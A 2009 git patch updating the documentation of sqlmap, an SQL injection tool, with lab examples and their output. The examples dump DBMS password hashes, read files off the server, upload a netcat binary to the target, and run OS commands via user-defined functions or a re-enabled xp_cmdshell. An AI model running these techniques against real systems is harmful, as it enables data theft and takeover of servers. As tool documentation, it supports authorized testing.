From 45e3ce798f72039976470e6514ec297133293845 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Sat, 25 Jul 2009 14:31:44 +0000 Subject: [PATCH] Updated documentation with all new features introduced since sqlmap 0.7-rc1 --- doc/README.html | 1099 ++++++++++++++++++++++++++++++++++++++++++----- doc/README.pdf | Bin 357125 -> 388061 bytes doc/README.sgml | 1089 +++++++++++++++++++++++++++++++++++++++++----- 3 files changed, 1960 insertions(+), 228 deletions(-) diff --git a/doc/README.html b/doc/README.html index 291224266..d43ba51c0 100644 --- a/doc/README.html +++ b/doc/README.html @@ -98,7 +98,9 @@ for x86, AMD64 and Itanium too.

Metasploit Framework for some of its post-exploitation takeover functionalities. You need to grab a copy of it from the download -page. The required version is 3.2 or above.

+page. The required version is 3.2 or above, recommended is the +latest 3.3 development version from Metasploit's subversion +repository.

Optionally, if you are running sqlmap on Windows, you may wish to install PyReadline library to be able to take advantage of the sqlmap TAB completion and @@ -403,42 +405,34 @@ stand-alone executable.

3. Download and update

-

sqlmap 0.7 release candidate 1 version can be downloaded as a -source gzip compressed file or as a -source zip compressed file.

-

sqlmap can be downloaded from its -SourceForge File List page. +SourceForge File List page. It is available in various formats:

-

Whatever way you downloaded sqlmap, run it with --update -option to update it to the latest stable version available on its -SourceForge File List page.

-

You can also checkout the source code from the sqlmap Subversion repository to give a try to the development release:

@@ -457,8 +451,9 @@ $ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev General Public License v2. sqlmap is copyrighted by Bernardo Damele A. G. -and -Daniele Bellucci.

+(2007-2009) and +Daniele Bellucci +(2006).

5. Usage

@@ -468,7 +463,7 @@ and 
 $ python sqlmap.py -h
 
-    sqlmap/0.7rc1
+    sqlmap/0.7
     by Bernardo Damele A. G. <bernardo.damele@gmail.com>
     
 Usage: sqlmap.py [options]
@@ -551,16 +546,15 @@ Options:
     --dbs               Enumerate DBMS databases
     --tables            Enumerate DBMS database tables (opt -D)
     --columns           Enumerate DBMS database table columns (req -T opt -D)
-    --dump              Dump DBMS database table entries (req -T, opt -D, -C,
-                        --start, --stop)
+    --dump              Dump DBMS database table entries (req -T, opt -D, -C)
     --dump-all          Dump all DBMS databases tables entries
     -D DB               DBMS database to enumerate
     -T TBL              DBMS database table to enumerate
     -C COL              DBMS database table column to enumerate
     -U USER             DBMS user to enumerate
     --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
-    --start=LIMITSTART  First table entry to dump
-    --stop=LIMITSTOP    Last table entry to dump
+    --start=LIMITSTART  First query output entry to retrieve
+    --stop=LIMITSTOP    Last query output entry to retrieve
     --sql-query=QUERY   SQL statement to be executed
     --sql-shell         Prompt for an interactive SQL shell
 
@@ -693,7 +687,7 @@ Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 [hh:mm:55] [INFO] testing MySQL
@@ -706,7 +700,7 @@ Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
@@ -728,7 +722,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:44] [TRAFFIC IN] HTTP response (OK - 200): @@ -749,7 +743,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -771,7 +765,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:17] [TRAFFIC IN] HTTP response (OK - 200): @@ -799,7 +793,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:18] [TRAFFIC IN] HTTP response (OK - 200): @@ -1110,7 +1104,7 @@ Host: 192.168.1.125:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ Connection: close @@ -1126,7 +1120,7 @@ Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 Cookie: ASPSESSIONIDSABTRCAS=469 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic @@ -1178,7 +1172,7 @@ Accept-language: en-us,en;q=0.5 Referer: http://www.google.com Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1195,7 +1189,7 @@ Connection: close 

-sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+sqlmap/0.7 (http://sqlmap.sourceforge.net)

@@ -1317,7 +1311,7 @@ Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M= -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1338,7 +1332,7 @@ Authorization: Digest username="testuser", realm="Testing digest authentication" nonce="Qw52C8RdBAA=2d7eb362292b24718dcb6e4d9a7bf0f13d58fa9d", uri="/sqlmap/mysql/digest/get_int.php?id=1", response="16d01b08ff2f77d8ff0183d706f96747", algorithm="MD5", qop=auth, nc=00000001, cnonce="579be5eb8753693a" -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1519,7 +1513,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&ca 
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
-  -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"
+  -p "user-agent" --user-agent "sqlmap/0.7 (http://sqlmap.sourceforge.net)"
 
 [hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
 [hh:mm:40] [INFO] testing connection to the target url
@@ -1659,7 +1653,7 @@ Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 [hh:mm:17] [INFO] GET parameter 'id' is custom injectable 
@@ -1736,7 +1730,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=
 [hh:mm:50] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200):
@@ -1758,7 +1752,7 @@ Content-Type: text/html
 [hh:mm:51] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
@@ -1780,7 +1774,7 @@ Content-Type: text/html
 [hh:mm:51] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
@@ -2211,7 +2205,7 @@ Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200):
@@ -2393,7 +2387,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -v 1
 [hh:mm:38] [INFO] testing Oracle
 [hh:mm:38] [INFO] confirming Oracle
 [hh:mm:38] [INFO] the back-end DBMS is Oracle
-[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1
+[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION 
+WHERE ROWNUM=1
 [hh:mm:38] [INFO] retrieved: 10
 [hh:mm:38] [INFO] performed 20 queries in 0 seconds
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
@@ -2786,11 +2781,11 @@ management system user.

 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
 
 [*] debian-sys-maint [1]:
-    password hash: *BBDC22D2B1E18F8628B2922864A621B32A1B1892
+    password hash: *BBDC22D2B1E18C8628D29228649621B32A1B1892
 [*] root [1]:
-    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
+    password hash: *81F5E21235407A884A6CD4A731FEBFB6AF209E1B
 [*] testuser [1]:
-    password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
+    password hash: *00E247BD5F9AF26AE0194B71E1E769D1E1429A29

@@ -2807,12 +2802,12 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --pas database management system users password hashes: [*] sa [1]: - password hash: 0x01000e16d704aa252b7c38d1aeae18756e98172f4b34104d8ee32c2f01b293b03edb7491f + password hash: 0x01000a16d704fa252b7c38d1aeae18756e98172f4b34104d8ce32c2f01b293b03edb7491f ba9930b62ee5d506955 header: 0x0100 - salt: 0e16d704 - mixedcase: aa252b7c38d1aeae18756e98172f4b34104d8ee3 - uppercase: 2c2f01b293b03edb7491fba9930b62ee5d506955 + salt: 0a16d704 + mixedcase: fa252b7c38d1aeae18756e98172f4b34104d8ee3 + uppercase: 2c2f01b293b03edb7491fba9930b62ce5d506955

@@ -2852,7 +2847,7 @@ CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1 [hh:mm:51] [INFO] performed 251 queries in 2 seconds database management system users password hashes: [*] postgres [1]: - password hash: md5d7d880f96044b72d0bba108ace96d1e4 + password hash: md5d7d880f96034b72d0bba108afe96c1e7

@@ -3322,7 +3317,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | NULL | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3376,7 +3371,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3389,7 +3384,7 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv "1","luther","blissett" "2","fluffy","bunny" "3","wu","ming" -"4","sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)","user agent header" +"4","sqlmap/0.7 (http://sqlmap.sourceforge.net)","user agent header" "5","","nameisnull" @@ -3419,7 +3414,7 @@ Table: users +----+----------------------------------------------+-------------------+ | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | +----+----------------------------------------------+-------------------+ @@ -3450,7 +3445,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | NULL | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3540,7 +3535,7 @@ Table: users +----+----------------------------------------------+-------------------+ | id | name | surname | +----+----------------------------------------------+-------------------+ -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 2 | fluffy | bunny | | 1 | luther | blisset | | 3 | wu | ming | @@ -3766,7 +3761,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql sql> [TAB TAB] LIMIT -(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y' +(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) +LIMIT 0, 1)='Y' AND ORD(MID((%s), %d, 1)) > %d CAST(%s AS CHAR(10000)) COUNT(%s) @@ -3779,7 +3775,8 @@ MID((%s), %d, %d) ORDER BY %s ASC SELECT %s FROM %s.%s SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) -SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s' +SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND +table_schema='%s' SELECT grantee FROM information_schema.USER_PRIVILEGES SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES SELECT schema_name FROM information_schema.SCHEMATA @@ -3835,10 +3832,12 @@ table_schema=CHAR(116,101,115,116) LIMIT 2, 1 [hh:mm:48] [INFO] performed 55 queries in 0 seconds [hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users [hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y -[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM test.users +[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM +test.users [hh:mm:04] [INFO] retrieved: 5 [hh:mm:04] [INFO] performed 13 queries in 0 seconds -[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many entries +[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many +entries do you want to retrieve? [a] All (default) [#] Specific number @@ -3853,8 +3852,8 @@ ORDER BY id ASC LIMIT 0, 1 ORDER BY id ASC LIMIT 0, 1 [hh:mm:09] [INFO] retrieved: luther [hh:mm:09] [INFO] performed 48 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 0, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 0, 1 [hh:mm:09] [INFO] retrieved: blissett [hh:mm:09] [INFO] performed 62 queries in 0 seconds [hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users @@ -3865,8 +3864,8 @@ ORDER BY id ASC LIMIT 1, 1 ORDER BY id ASC LIMIT 1, 1 [hh:mm:09] [INFO] retrieved: fluffy [hh:mm:09] [INFO] performed 48 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 1, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 1, 1 [hh:mm:09] [INFO] retrieved: bunny [hh:mm:09] [INFO] performed 41 queries in 0 seconds [hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users @@ -3877,8 +3876,8 @@ ORDER BY id ASC LIMIT 2, 1 ORDER BY id ASC LIMIT 2, 1 [hh:mm:09] [INFO] retrieved: wu [hh:mm:09] [INFO] performed 20 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 2, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 2, 1 [hh:mm:09] [INFO] retrieved: ming [hh:mm:10] [INFO] performed 34 queries in 0 seconds SELECT * FROM test.users [3]: @@ -3904,7 +3903,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql [...] back-end DBMS: PostgreSQL -[10:11:42] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER +[10:hh:mm] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER sql> SELECT COUNT(name) FROM users [10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' [10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n @@ -3917,8 +3916,8 @@ SELECT COUNT(name) FROM users: '4' sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell'); [10:12:35] [INFO] testing stacked queries support on parameter 'id' [10:12:40] [INFO] the web application supports stacked queries on parameter 'id' -[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users (id, name, surname) -VALUES (5, 'from', 'sql shell');' +[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users +(id, name, surname) VALUES (5, 'from', 'sql shell');' [10:12:40] [INFO] done sql> SELECT COUNT(name) FROM users [10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' @@ -3951,20 +3950,22 @@ support when the back-end DBMS is PostgreSQL.

Option: --read-file

It is possible to retrieve the content of files from the underlying file -system when the back-end database management is system is either MySQL, -PostgreSQL or Microsoft SQL Server. +system when the back-end database management system is either MySQL, +PostgreSQL or Microsoft SQL Server and the session user has the needed +privileges to abuse database specific functionalities and architectural +weaknesses. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

-

The techniques implemented are detailed on the white paper +

These techniques are detailed on the white paper Advanced SQL injection to operating system full control.

-

Example on a PostgreSQL 8.3.5 target:

+

Example on a PostgreSQL 8.3.5 target to retrieve a text file:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --read-file \
-  "C:\example.txt" -v2
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \
+  --read-file "C:\example.txt" -v 2
 
 [...]
 [hh:mm:53] [INFO] the back-end DBMS is PostgreSQL
@@ -4022,45 +4023,98 @@ This is a text file

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target to +retrieve a binary file:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --read-file "C:\example.exe" --union-use -v 1
+
+[...]
+[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:49] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing 
+technique
+[hh:mm:49] [INFO] confirming full inband sql injection on parameter 'name'
+[hh:mm:49] [WARNING] the target url is not affected by an exploitable full inband sql 
+injection vulnerability
+[hh:mm:49] [INFO] confirming partial (single entry) inband sql injection on parameter 
+'name' by appending a false condition after the parameter value
+[hh:mm:49] [INFO] the target url is affected by an exploitable partial (single entry) 
+inband sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
+ALL SELECT NULL, NULL, NULL-- AND 'sjOfJ'='sjOfJ'
+
+[hh:mm:49] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:54] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:54] [INFO] fetching file: 'C:/example.exe'
+[hh:mm:54] [INFO] the SQL query provided returns 3 entries
+C:/example.exe file saved to:    '/home/inquis/sqlmap/output/192.168.1.121/files/
+C__example.exe'
+
+[hh:mm:54] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/
+192.168.1.121'
+
+$ ls -l output/192.168.1.121/files/C__example.exe 
+-rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/192.168.1.121/files/C__example.exe
+
+$ file output/192.168.1.121/files/C__example.exe 
+output/192.168.1.121/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
+
+
+

+

Write a local file on the back-end DBMS file system

Options: --write-file and --dest-file

It is possible to upload a local file to the underlying file system when -the back-end database management is system is either MySQL, PostgreSQL or -Microsoft SQL Server. +the back-end database management system is either MySQL, PostgreSQL or +Microsoft SQL Server and the session user has the needed privileges to +abuse database specific functionalities and architectural weaknesses. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

-

The techniques implemented are detailed on the white paper +

These techniques are detailed on the white paper Advanced SQL injection to operating system full control.

-

Example on a MySQL 5.0.67 target:

+

Example on a MySQL 5.0.67 target to upload a binary UPX-compressed +file:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --write-file \
-  "/home/inquis/software/netcat/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
+$ file /tmp/nc.exe.packed 
+/tmp/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit
+
+$ ls -l /tmp/nc.exe.packed
+-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" --write-file \
+  "/tmp/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
 
 [...]
-[01:12:29] [INFO] the back-end DBMS is MySQL
+[hh:mm:29] [INFO] the back-end DBMS is MySQL
 web server operating system: Windows 2003 or 2008
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
 back-end DBMS: MySQL >= 5.0.0
 
-[01:12:29] [INFO] testing stacked queries support on parameter 'id'
-[01:12:29] [INFO] detecting back-end DBMS version from its banner
-[01:12:29] [INFO] retrieved: 5.0.67
-[01:12:36] [INFO] the web application supports stacked queries on parameter 'id'
-[01:12:36] [INFO] fingerprinting the back-end DBMS operating system
-[01:12:36] [INFO] retrieved: C
-[01:12:36] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:29] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:29] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:29] [INFO] retrieved: 5.0.67
+[hh:mm:36] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:36] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:36] [INFO] retrieved: C
+[hh:mm:36] [INFO] the back-end DBMS operating system is Windows
 do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully 
 written on the back-end DBMS file system? [Y/n] y
-[01:12:52] [INFO] retrieved: 31744
-[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same 
-size as the local file '/home/inquis/software/netcat/nc.exe.packed'
+[hh:mm:52] [INFO] retrieved: 31744
+[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, 
+same size as the local file '/tmp/nc.exe.packed'

@@ -4069,55 +4123,850 @@ size as the local file '/home/inquis/software/netcat/nc.exe.packed'

5.9 Operating system access

-

Execute an operating system command

+

Execute arbitrary operating system command

-

Option: --os-cmd

+

Options: --os-cmd and --os-shell

-

TODO

+

It is possible to execute arbitrary commands on the underlying operating +system when the back-end database management system is either MySQL, +PostgreSQL or Microsoft SQL Server and the session user has the needed +privileges to abuse database specific functionalities and architectural +weaknesses.

-

The techniques implemented are detailed on the white paper +

On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality +demonstrated above) a shared library (binary file) containing two +user-defined functions, sys_exec() and sys_eval(), then +it creates these two functions on the database and call one of them to +execute the specified command, depending on the user's choice to display +the standard output or not. +On Microsoft SQL Server, sqlmap abuses the xp_cmshell stored +procedure: if it's disable sqlmap re-enables it, if it does not exist, +sqlmap creates it from scratch.

+ +

If the user wants to retrieve the command standard output, sqlmap will use +one of the enumeration SQL injection techniques (blind or inband) to +retrieve it, viceversa sqlmap will use the stacked query SQL injection +technique to execute the command without returning anything to the user.

+ +

These techniques are detailed on the white paper Advanced SQL injection to operating system full control.

+

It is possible to specify a single command to be executed with the +--os-cmd option.

-

Prompt for an interactive operating system shell

+

Example on a PostgreSQL 8.3.5 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \
+  --os-cmd "whoami" -v 1
 
-
Option: --os-shell

+[...]
+[hh:mm:05] [INFO] the back-end DBMS is PostgreSQL
+web server operating system: Windows 2003 or 2008
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
+back-end DBMS: PostgreSQL
 
-
TODO

+[hh:mm:05] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:05] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:05] [INFO] retrieved: 8.3.5,
+[hh:mm:15] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:15] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:15] [INFO] retrieved: 1
+[hh:mm:16] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:16] [INFO] testing if current user is DBA
+[hh:mm:16] [INFO] retrieved: 1
+[hh:mm:16] [INFO] checking if sys_exec UDF already exist
+[hh:mm:16] [INFO] retrieved: 0
+[hh:mm:18] [INFO] checking if sys_eval UDF already exist
+[hh:mm:18] [INFO] retrieved: 0
+[hh:mm:20] [INFO] creating sys_exec UDF from the binary UDF file
+[hh:mm:20] [INFO] creating sys_eval UDF from the binary UDF file
+do you want to retrieve the command standard output? [Y/n] 
+[hh:mm:35] [INFO] retrieved: w2k3dev\postgres
+command standard output:    'w2k3dev\postgres'
+
+
+

-

The techniques implemented are detailed on the white paper -Advanced SQL injection to operating system full control.

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --os-cmd "whoami" --union-use -v 1
+
+[...]
+[hh:mm:58] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:58] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing 
+technique
+[hh:mm:58] [INFO] confirming full inband sql injection on parameter 'name'
+[hh:mm:58] [WARNING] the target url is not affected by an exploitable full inband sql 
+injection vulnerability
+[hh:mm:58] [INFO] confirming partial (single entry) inband sql injection on parameter 'name' 
+by appending a false condition after the parameter value
+[hh:mm:58] [INFO] the target url is affected by an exploitable partial (single entry) inband 
+sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
+ALL SELECT NULL, NULL, NULL-- AND 'SonLv'='SonLv'
+
+[hh:mm:58] [INFO] testing stacked queries support on parameter 'name'
